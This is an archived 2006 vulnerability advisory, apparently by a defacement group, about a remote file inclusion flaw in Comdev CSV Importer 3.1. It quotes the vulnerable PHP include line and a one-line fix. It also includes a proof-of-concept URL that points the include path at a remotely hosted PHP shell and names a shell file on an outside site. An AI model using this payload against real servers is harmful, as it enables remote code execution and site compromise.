Comdev CSV Importer 3.1 :) <= Remote File Inclusion

2006-09-28T00:00:00
ID SECURITYVULNS:DOC:14458
Type securityvulns
Reporter Securityvulns
Modified 2006-09-28T00:00:00

Description

+-------------------------------------------------------------------- + + Comdev CSV Importer 3.1 :) <= Remote File Inclusion + +-------------------------------------------------------------------- + + Affected Software .: Comdev CSV Importer 3.1 + Venedor ...........: http://www.comdevweb.com + Class .............: Remote File Inclusion + Risk ..............: high (Remote File Execution) + Found by ..........: rUnViRuS + Original advisory .: http://www.wdzone.net/ http://www.worlddefacers.de/ + Contact ...........: stormhacker[at]hotmail[.]com + +-------------------------------------------------------------------- + + Code include.php: + + ..... + include($path["docroot"]."common/wce.login.php"); + ..... + +-------------------------------------------------------------------- + + $path["docroot"] is not properly sanitized before being used. + The bug is in the "Comdev CSV Importer" Package for Comdev CSV Importer. + +-------------------------------------------------------------------- + + Solution: + Add this line to your php-file: + + $path["docroot"] ="user/dir" //Your root path + +-------------------------------------------------------------------- + PoC: + Place a PHPShell on a remote location: + http://wdzone.net/sh.txt? + + + http://[target]/include.php?path["docroot"]=http://phpshell + +-------------------------------------------------------------------- + [W]orld [D]efacers [T]eam + Greets: + || rUnViRuS || - || papipsycho || - || HeX || - || Linux Master || BLaCKWHITE || + || Pro Hacker || + +-------------------------[ W D T ]----------------------------------